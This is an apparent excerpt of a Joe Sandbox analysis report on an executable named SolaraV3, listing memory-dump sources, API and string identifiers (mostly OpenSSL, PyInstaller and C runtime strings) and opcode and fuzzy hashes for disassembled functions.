                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046615459.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046695461.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046695461.00007FF6DC741000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046842418.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff6dc700000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID: verbose
                                                                                                                                                                                                                              • API String ID: 3215553584-579935070
                                                                                                                                                                                                                              • Opcode ID: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
                                                                                                                                                                                                                              • Instruction ID: acca1cefd9955db0fb23f69d374c24db7b22b3884288c6a271468267b466f64d
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7C91D072A08A4A85F7618EACD4607BD37A5FB40BA4F44A137DA5D833D6DE3CE4279300
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.2046400546.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046314384.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046615459.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046695461.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046695461.00007FF6DC741000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046842418.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff6dc700000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                                                                                                                                                              • API String ID: 3215553584-1196891531
                                                                                                                                                                                                                              • Opcode ID: 7089664b0a027e884898b454f5d4d61e653d4f3baae8c024cbe23c99275e4c13
                                                                                                                                                                                                                              • Instruction ID: 15847c40128809faf47aee091a7e908b096008143f76c1c92c40a1cbc4d07e5f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7089664b0a027e884898b454f5d4d61e653d4f3baae8c024cbe23c99275e4c13
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9181D172E1C64B85F7649F2D813227C36A0AB11B88F55A037EA49D72D5CF2CE9279301
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.2046400546.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046314384.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046615459.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046695461.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046695461.00007FF6DC741000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046842418.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff6dc700000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                                                                                                                              • String ID: csm
                                                                                                                                                                                                                              • API String ID: 2395640692-1018135373
                                                                                                                                                                                                                              • Opcode ID: 4bd751ab4a757734da5bac4c310991cbc8ef63d187f18c7a3c34a87046479a0f
                                                                                                                                                                                                                              • Instruction ID: 2bf336eb9efcc45af238ce5be99ebec237e132ad660c3322bdd9308f1f0f4caa
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4bd751ab4a757734da5bac4c310991cbc8ef63d187f18c7a3c34a87046479a0f
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DB519332A1970A8ADB14CB26E44467C73A1FB54B98F504136FA4D87784EF7EE862D700
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.2046400546.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046314384.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046615459.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046695461.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046695461.00007FF6DC741000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046842418.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff6dc700000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CallEncodePointerTranslator
                                                                                                                                                                                                                              • String ID: MOC$RCC
                                                                                                                                                                                                                              • API String ID: 3544855599-2084237596
                                                                                                                                                                                                                              • Opcode ID: 1c81a5d02d7979dd4dad50f55436adaf5051385037e661534b2c2f58034018d3
                                                                                                                                                                                                                              • Instruction ID: 3642e66e2c657ee63a75e3045ced45d3b170a8ac51a78ca35b94e54253fc2eca
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1c81a5d02d7979dd4dad50f55436adaf5051385037e661534b2c2f58034018d3
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 35617232908BC985D7609B16E4403AEB7A0FB857D4F044226EBDC87B56DF7DE1A1CB00
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.2046400546.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046314384.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046615459.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046695461.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046695461.00007FF6DC741000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046842418.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff6dc700000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                                                                                              • String ID: csm$csm
                                                                                                                                                                                                                              • API String ID: 3896166516-3733052814
                                                                                                                                                                                                                              • Opcode ID: b828653c103bc27f8420a51a056d9897bfd6e6497fd7c081c32eb92dd3ed2bbb
                                                                                                                                                                                                                              • Instruction ID: 571916d6c6b2b251612df15d85af1462785746471ce510bc39ed9345e676af98
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b828653c103bc27f8420a51a056d9897bfd6e6497fd7c081c32eb92dd3ed2bbb
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 12518E72A0834A86EB648A23904436C77B0FB55B94F14413BFA9DC7B85CF3DE462D705
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.2047840849.00007FFB0B811000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFB0B810000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047797136.00007FFB0B810000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0B81D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0B875000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0B889000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0B899000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0B8AD000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BA5E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BA60000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BA8B000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BABD000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BAE2000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BB30000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BB38000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BB55000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BB62000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2048908453.00007FFB0BB66000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2048955881.00007FFB0BB68000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ffb0b810000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: ..\s\crypto\async\async.c$T
                                                                                                                                                                                                                              • API String ID: 0-2182492907
                                                                                                                                                                                                                              • Opcode ID: d4c81dbd977d12fa69bd9a3abb1c4e90a5e36bc3b63dafdfdd5457bbed4ac51f
                                                                                                                                                                                                                              • Instruction ID: f785fc8c28cc1ab164dc9aa3f5f2c378419101e410f027f37f6bcfe723bd6d73
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d4c81dbd977d12fa69bd9a3abb1c4e90a5e36bc3b63dafdfdd5457bbed4ac51f
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 74518BB1A09B4386EB209F31E400EB96764EF84B80F449435DA4F87BB5DF3DE5498B14
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.2047840849.00007FFB0B8AD000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFB0B810000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047797136.00007FFB0B810000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0B811000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0B81D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0B875000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0B889000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0B899000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BA5E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BA60000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BA8B000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BABD000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BAE2000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BB30000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BB38000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BB55000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BB62000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2048908453.00007FFB0BB66000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2048955881.00007FFB0BB68000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ffb0b810000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: getnameinfohtons
                                                                                                                                                                                                                              • String ID: $..\s\crypto\bio\b_addr.c
                                                                                                                                                                                                                              • API String ID: 1503050688-1606403076
                                                                                                                                                                                                                              • Opcode ID: af598f06c0245db41dead80509d3e431c698856c8df4789aecb38cc2124cad97
                                                                                                                                                                                                                              • Instruction ID: 7f2c3f6ee71b416c07f7d7cb66300d122ea6c2377aad5bb55d2fe877c7e1c85a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: af598f06c0245db41dead80509d3e431c698856c8df4789aecb38cc2124cad97
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6E51A0A2A19B4686FB209F31E001EB97364EB44744F44C436EB8E876B5EF3DE9858710
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.2047840849.00007FFB0B811000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFB0B810000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047797136.00007FFB0B810000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0B81D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0B875000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0B889000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0B899000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0B8AD000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BA5E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BA60000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BA8B000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BABD000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BAE2000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BB30000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BB38000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BB55000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BB62000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2048908453.00007FFB0BB66000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2048955881.00007FFB0BB68000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ffb0b810000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: ..\s\crypto\bio\b_sock.c$J$host=
                                                                                                                                                                                                                              • API String ID: 0-1729655730
                                                                                                                                                                                                                              • Opcode ID: fb7855fcd371f05ee0f8c06c4a9d3ff59d339786e254bf31641fa772ec444ff7
                                                                                                                                                                                                                              • Instruction ID: 64462e7cb20229aeeb13f5984b8f0d19cc4e04f61015ddad1774b799b132111b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fb7855fcd371f05ee0f8c06c4a9d3ff59d339786e254bf31641fa772ec444ff7
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7531A1A2B0864282EB10DB65E441DAEA364FB84790F444435EB8EC7BBADF3DD5458B04
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • CreateDirectoryW.KERNEL32(00000000,?,00007FF6DC70352C,?,00000000,00007FF6DC703F1B), ref: 00007FF6DC707F32
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.2046400546.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046314384.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046615459.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046695461.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046695461.00007FF6DC741000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046842418.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff6dc700000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CreateDirectory
                                                                                                                                                                                                                              • String ID: %.*s$%s%c$\
                                                                                                                                                                                                                              • API String ID: 4241100979-1685191245
                                                                                                                                                                                                                              • Opcode ID: a1c59376f93c8b4c6db0aee125681cb96c2ab9e1787ffa8cf6eb7b68f1c1c36c
                                                                                                                                                                                                                              • Instruction ID: 6159a3fe0909b507218d4bb37585b52417ebddbb817d84b32bed9a8ce47fd634
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a1c59376f93c8b4c6db0aee125681cb96c2ab9e1787ffa8cf6eb7b68f1c1c36c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5431E821719AC945EA218B22E4103AE6364EF84BE0F540232FE6D877C9DF3CD657CB00
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.2046400546.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046314384.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046615459.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046695461.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046695461.00007FF6DC741000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046842418.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff6dc700000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Message
                                                                                                                                                                                                                              • String ID: ERROR$Error$[PYI-%d:%ls]
                                                                                                                                                                                                                              • API String ID: 2030045667-255084403
                                                                                                                                                                                                                              • Opcode ID: 035b7a672ed8def45fe49a9c290554376ffedfd07499b26c39d849b73b89d90e
                                                                                                                                                                                                                              • Instruction ID: ac48b7fb5083cbf064f8585c0f2e134070770dd78a8aba58462d55460d0510f4
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 035b7a672ed8def45fe49a9c290554376ffedfd07499b26c39d849b73b89d90e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9B21AE72B08B4586E7219B15F8957EE63A4FB88780F404136EA8D9365ADE3CE266C740
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.2047840849.00007FFB0B811000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFB0B810000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047797136.00007FFB0B810000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0B81D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0B875000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0B889000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0B899000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0B8AD000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BA5E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BA60000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BA8B000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BABD000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BAE2000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BB30000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BB38000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BB55000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BB62000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2048908453.00007FFB0BB66000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2048955881.00007FFB0BB68000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ffb0b810000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: 00007B5630
                                                                                                                                                                                                                              • String ID: ..\s\crypto\pem\pem_pkey.c$DH PARAMETERS$X9.42 DH PARAMETERS
                                                                                                                                                                                                                              • API String ID: 2248877218-3633731555
                                                                                                                                                                                                                              • Opcode ID: f7c8cefcc52172e22eb95b664cdde1b2570e3c7e5a17e47a6528b570642fd444
                                                                                                                                                                                                                              • Instruction ID: bb2f252c509fe09fb7441d92f05c7791f7c08225c767a6c46069bd128fadc1f6
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f7c8cefcc52172e22eb95b664cdde1b2570e3c7e5a17e47a6528b570642fd444
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7B2177A1609746C1EA10DBB5E4409AAB3A4FF847D4F44C436EA4E87B75EF7DE544CB00
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.2047840849.00007FFB0B811000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFB0B810000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047797136.00007FFB0B810000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0B81D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0B875000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0B889000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0B899000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0B8AD000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BA5E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BA60000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BA8B000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BABD000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BAE2000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BB30000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BB38000.00000040.00000001.01000000.0000000F.sdmpDownload File
